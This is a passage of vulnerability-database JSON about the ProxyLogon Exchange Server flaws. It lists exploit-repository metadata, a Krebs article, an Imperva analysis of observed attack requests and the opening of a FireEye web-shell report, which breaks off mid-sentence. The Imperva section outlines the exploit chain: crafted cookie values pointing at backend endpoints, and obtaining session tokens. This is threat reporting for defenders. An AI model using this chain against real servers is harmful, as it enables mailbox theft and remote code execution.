"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-11-16T01:46:59", "id": "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-27T21:01:50", "description": "# proxylogon\n\nProof-of-concept exploit for CVE-2021-26855 and CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-24T01:12:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-03-27T19:34:57", "id": "D7D704DD-277E-5739-BD5E-3782370FCCB3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T03:31:40", "description": "# CVE-2021-26855-PoC\nPoC exploit code for CVE-2021-26855. \n\nOrig...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-01-10T21:06:44", "id": "14573955-860C-5947-8F2F-86347A606742", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-28T14:00:56", "description": "# ProxyLogon For Python3\nProxyLogon(CVE-2021-26855+CVE-2021-2706...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-17T03:56:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-03-28T09:27:18", "id": "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:15:35", "description": "# proxylogscan\n\n<img src=\"https://proxylogon.com/images/logo-whi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T11:54:32", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-03-02T15:41:34", "id": "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:19:57", "description": "Disclaimer: All the information provided in this repository is f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T10:14:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855"], "modified": "2021-03-24T16:54:40", "id": "7275794A-F2F6-51E6-B514-185E494D8A3F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:31:20", "description": "# Proxyshell-Scanner\nnuclei scanner for Proxyshell RCE (CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T15:01:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34423"], "modified": "2022-03-02T12:56:33", "id": "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-21T13:50:39", "description": "# CVE-2021-26855-PoC\nPoC exploit code for CVE-2021-26855. \n\nOrig...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T16:54:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-21978", "CVE-2021-26855"], "modified": "2022-02-21T12:12:08", "id": "F5339382-9321-5B96-934D-B803353CC9E3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-03T23:52:26", "description": "# CVE-2021-26855\nCVE-2021-26855 ssrf \u7b80\u5355\u5229\u7528\ngolang \u7ec3\u4e60\n\n## \u5f71\u54cd\u7248\u672c\nExc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T08:39:05", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978", "CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-04-03T10:42:30", "id": "65D56BCD-234F-52E5-9388-7D1421B31B1B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "krebs": [{"lastseen": "2021-03-10T12:47:11", "description": "**Microsoft Corp.** today released software updates to plug four security holes that attackers have been using to plunder email communications at companies that use its **Exchange Server** products. The company says all four flaws are being actively exploited as part of a complex attack chain deployed by a previously unidentified Chinese cyber espionage group.\n\n\n\nThe software giant typically releases security updates on the second Tuesday of each month, but it occasionally deviates from that schedule when addressing active attacks that target newly identified and serious vulnerabilities in its products.\n\nThe patches released today fix security problems in **Microsoft Exchange Server 2013**, **2016** and **2019**. Microsoft said its **Exchange Online** service -- basically hosted email for businesses -- is not impacted by these flaws.\n\nMicrosoft credited researchers at Reston, Va. based [Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) for reporting the attacks. Volexity **President Steven Adair** told KrebsOnSecurity it first spotted the attacks on Jan. 6, 2021.\n\nAdair said while the exploits used by the group may have taken great skills to develop, they require little technical know-how to use and can give an attacker easy access to all of an organization's email if their vulnerable Exchange Servers are directly exposed to the Internet.\n\n"These flaws are very easy to exploit," Adair said. "You don't need any special knowledge with these exploits. You just show up and say 'I would like to break in and read all their email.' That's all there is to it."\n\nMicrosoft says the flaws are being used by a previously unknown Chinese espionage group that's been dubbed "**Hafnium**," which is known to launch its attacks using hosting companies based in the United States.\n\n"Hafnium primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs," Microsoft said. "HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA."\n\nAccording to Microsoft, Hafnium attackers have been observed combining all four zero-day flaws to target organizations running vulnerable Exchange Server products.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a "server-side request forgery" (SSRF) flaw, in which a server (in this case, an on-premises Exchange Server) can be tricked into running commands that it should never have been permitted to run, such as authenticating as the Exchange server itself.\n\nThe attackers used [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) to run code of their choice under the "system" account on a targeted Exchange server. The other two zero-day flaws -- [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) -- could allow an attacker to write a file to any part of the server.\n\nAfter exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised server, Microsoft said. Web shells are essentially software backdoors that allow attackers to steal data and perform additional malicious actions that lead to further compromise.\n\nNeither Microsoft nor Volexity is aware of publicly available code that would allow other cybercriminals to exploit these Exchange vulnerabilities. But given that these attacks are in the wild now, it may only be a matter of days before exploit code is publicly available online.\n\nMicrosoft stressed that the exploits detailed today were in no way connected to the [separate SolarWinds-related attacks](<https://krebsonsecurity.com/?s=solar+winds&x=0&y=0>). "We continue to see no evidence that the actor behind SolarWinds discovered or exploited any vulnerability in Microsoft products and services," the company said.\n\nFurther reading:\n\n[Microsoft's writeup on new Hafnium nation state cyberattacks](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>)\n\n[Microsoft technical advisory on the four Exchange Server flaws](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:19:17", "type": "krebs", "title": "Microsoft: Chinese Cyberspies Used 4 Exchange Server Flaws to Plunder Emails", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:19:17", "id": "KREBS:65D25A653F7348C7F18FFD951447B275", "href": "https://krebsonsecurity.com/2021/03/microsoft-chinese-cyberspies-used-4-exchange-server-flaws-to-plunder-emails/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2021-03-29T14:27:27", "description": "### Introduction\n\nOn 2 March 2021, [Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and [Veloxity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) produced disclosures outlining the discovery of four zero day vulnerabilities affecting multiple versions of Microsoft Exchange Server. Each of the vulnerabilities have been attributed a severity rating from high to critical, however the most impactful statement from both Microsoft and Veloxity was that these vulnerabilities formed an attack chain which was being actively exploited in the wild.\n\nSince the publication of these disclosures, details have emerged regarding the observed source of the exploitation of these vulnerabilities. The attacks are being widely attributed to the state-sponsored group dubbed Hafnium, [alleged](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) to be operating out of China.\n\nThe most notable of the new CVEs, [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), is a SSRF vulnerability in Microsoft Exchange which allows an attacker to induce the server into performing \u201cunintended actions\u201d through the use of a series of specially crafted POST requests. The attacker can leverage this vulnerability to exploit the other CVEs to perform malicious actions, such as dump private email, or even achieve remote code execution.\n\nImperva has put dedicated security rules in place to protect our customers in a direct response to the initial disclosures. Imperva has also performed analysis on the attempted exploitation of these CVEs and we have produced the following insights.\n\n### Observations and Statistics\n\nSince the 2 March disclosures, Imperva has observed over **44k** scanning and exploitation attempt sessions in the wild from over **1,600** unique source IPs, related to the Microsoft Exchange [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) SSRF. From this data, we have been able to identify the most targeted industries and countries which have been affected by the vulnerability in the aftermath of the disclosures.\n\n### Targeted Industries\n\nOne of the key observations we have made is that this vulnerability has impacted almost every category of industry, this observation is explained by how ubiquitous the use of Microsoft Exchange is across all sectors. According to our data, the Computing & IT sector was the most targeted industry, with 21% of all targeted sites belonging to this category. Next was Financial Services with 18%, and Telecoms and ISPs completed the top 3 with 10.5%. Below we show the breakdown of scanning and exploitation attempts against various industries.\n\n### Targeted Countries\n\nImperva observed both scanning and exploitation attempts against sites worldwide, with the US being the most targeted country, with the UK and Singapore a distant second and third, respectively.\n\n### Source Countries\n\nImperva observed that since the disclosures, relatively few scanning and exploitation attempts have been made from Chinese sources. This could be because exploitation, and to a greater extent, scanning has shifted to the wider public. It may also be because the attackers are using proxies to carry out the attacks. The chart below shows the top attacking countries by session count observed by Imperva analysts since the disclosures.\n\n### Attacker IP Reputation\n\nImperva\u2019s IP reputation allows for the identification of potentially suspicious or malicious behaviour by means of tagging relevant IPs. From this data, **42.3%** of the attacker source IPs were previously tagged by Imperva as having exhibited malicious behaviour and **8.45%** of the attacker source IPs were previously tagged by Imperva as being identified as vulnerability scanners.\n\n### Observed Attacker Activity\n\nImperva analysts have observed various indicators of the attempted exploitation of the Microsoft Exchange Hafnium [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) in the wild, indicating various motives on the part of the attackers. As mentioned previously, an attacker can leverage the vulnerability to perform various unauthorized actions, including the collection of private information, and even the writing of arbitrary files to the server resulting in remote code execution. In this section, we will discuss some of the requests we have observed and the perceived intentions and motivation of the attackers.\n\nDetailed descriptions of how the exploit chain works, and how it can be exploited are available at various different sources [[1](<https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265>)][[2](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>)], however the important thing to understand is that the vulnerability allows an attacker to send malicious requests to various backend components in Microsoft Exchange by means of a specially crafted POST request to either the Outlook Web Application or the Exchange Admin Centre, where the \u201cX-BEResource\u201d and \u201cX-AnonResource-Backend" cookie values can be manipulated to specify the targeted resource. In our investigation following the disclosures we have observed the following in our data.\n\n### Crafted requests to /EWS/Exchange.asmx\n\nA common exploit request observed by Imperva attempting to exploit the CVE-2021-26855 SSRF vulnerability was a POST request to Exchange Admin Centre (/ecp/) and Outlook Web Application endpoints (/owa/) endpoint, with the crafted cookie value endpoints set to the Exchange Web Services endpoint \u201c/EWS/Exchange.asmx\u201d. This allows the attacker to gain authenticated access to private mail on the server. This request accounted for **18%** of exploitation attempts observed.\n\n### Crafted requests to /autodiscover/autodiscover.xml\n\nThe most common exploitation attempt of the SSRF observed by Imperva analysts were requests to the Exchange Admin Centre endpoint (/ecp), with the vulnerabile cookie set with the FQDN of the server, and the endpoint of /autodiscover/autodiscover.xml.\n\nAutodiscover in Exchange is a service which allows for the rapid collection of Exchange configurations, service URLs and supported protocols, therefore it makes an obvious target for attackers who are attempting to quickly gather information, escalate privileges and maintain persistence. In the case of this vulnerability the autodiscover service could be used to gather the information required for further exploitation of the other CVEs associated with the chain. This request accounted for **51%** of exploitation attempts observed.\n\n### Crafted requests to /mapi/emsmdb\n\nAnother pattern Imperva analysts observed were crafted POST requests to the Exchange Admin Centre (/ecp), with the cookie value crafted with the **/mapi/emsmdb** endpoint.\n\nResearch into the published exploits and disclosures indicate that the \u201c/mapi/emsmdb\u201d endpoint can be abused to procure a valid SID, which can then allow the attacker to gain privileges to the Exchange \u201c**proxyLogin.ecp**\u201d endpoint (Exchange HTTP proxy), which can in turn be used to obtain a valid \u201c**ASP.NET_SessionID**\u201d and \u201c**msExchEcpCanary**\u201d values which are required for further chained exploitation of MS exchange. This request accounted for **3%** of exploitation attempts observed.\n\n### How Imperva protects you\n\nImperva has implemented rules in [Cloud WAF](<https://www.imperva.com/products/web-application-firewall-waf/>) and [On Prem WAF](<https://www.imperva.com/products/web-application-firewall-waf/>), which are effective against all exploitation of CVE-2021-26855. These rules are also effective against the chained exploitation of the subsequent CVEs: [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>).\n\n### Check if you have been compromised\n\nSince the disclosures of these zero day vulnerabilities, various news articles have been published reporting mass exploitation [[1](<https://www.bbc.com/news/technology-56372188>)][[2](<https://www.zdnet.com/article/microsoft-exchange-server-zero-day-attacks-malicious-software-found-on-2300-machines-in-uk/>)]. We recommend that if you have unpatched exchange servers in your organization, you apply the latest patches from Microsoft as soon as possible, and use the following [guide](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) from Microsoft to check for any indicators of compromise.\n\nThe post [Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures](<https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T15:06:38", "type": "impervablog", "title": "Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-26T15:06:38", "id": "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "href": "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-11T12:35:13", "description": "Beginning in January 2021, Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment. The observed activity included creation of web shells for persistent access, remote code execution, and reconnaissance for endpoint security solutions. Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM, a privileged local account on the Windows operating system. Furthermore, the process that created the web shell was UMWorkerProcess.exe, the process responsible for Exchange Server\u2019s Unified Messaging Service. In subsequent investigations, we observed malicious files created by w3wp.exe, the process responsible for the Exchange Server web front-end.\n\nIn response to this activity, we built threat hunting campaigns designed to identify additional Exchange Server abuse. We also utilized this data to build higher-fidelity detections of web server process chains. On March 2, 2021, Microsoft released a [blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) that detailed multiple zero-day vulnerabilities used to attack on-premises versions of Microsoft Exchange Server. Microsoft also issued emergency Exchange Server updates for the following vulnerabilities:\n\n**CVE**\n\n| \n\n**Risk Rating**\n\n| \n\n**Access Vector**\n\n| \n\n**Exploitability**\n\n| \n\n**Ease of Attack**\n\n| \n\n**Mandiant Intel** \n \n---|---|---|---|---|--- \n \n**CVE-2021-26855**\n\n| \n\nCritical\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004941>) \n \n**CVE-2021-26857**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004938>) \n \n**CVE-2021-26858**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004944>) \n \n**CVE-2021-27065**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004939>) \n \nTable 1: List of March 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\nThe activity reported by Microsoft aligns with our observations. **FireEye currently tracks this activity in three clusters, UNC2639, UNC2640, and UNC2643. We anticipate additional clusters as we respond to intrusions.** We recommend following Microsoft\u2019s guidance and patching Exchange Server immediately to mitigate this activity.\n\nBased on our telemetry, we have identified an array of affected victims including US-based retailers, local governments, a university, and an engineering firm. Related activity may also include a Southeast Asian government and Central Asian telecom. [Microsoft reported](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) the exploitation occurred together and is linked to a single group of actors tracked as \u201cHAFNIUM\u201d, a group that has previously targeted the US-based defense companies, law firms, infectious disease researchers, and think tanks.\n\nIn this blog post, we will detail our observations on the active investigations we are currently performing. As our experience with and knowledge of this threat actor grows, we will update this post or release new technical details as appropriate. For our Managed Defense Customers, we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity.\n\nWe will be discussing these attacks more in an [upcoming webinar on Mar. 17, 2021](<https://www.brighttalk.com/webcast/7451/475010?utm_source=FireEye&utm_medium=brighttalk&utm_campaign=475010>).\n\n#### From Exploit to Web Shell\n\nBeginning in January 2021, Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer\u2019s environment. The web shell, named help.aspx (MD5: 4b3039cf227c611c45d2242d1228a121), contained code to identify the presence of (1) FireEye xAgent, (2) CarbonBlack, or (3) CrowdStrike Falcon endpoint products and write the output of discovery. Figure 1 provides a snippet of the web shell\u2019s code.\n\n\n\n \nFigure 1: Snippet of the web shell help.aspx, crafted to identify the presence of endpoint security software on a victim system\n\nThe web shell was written to the system by the 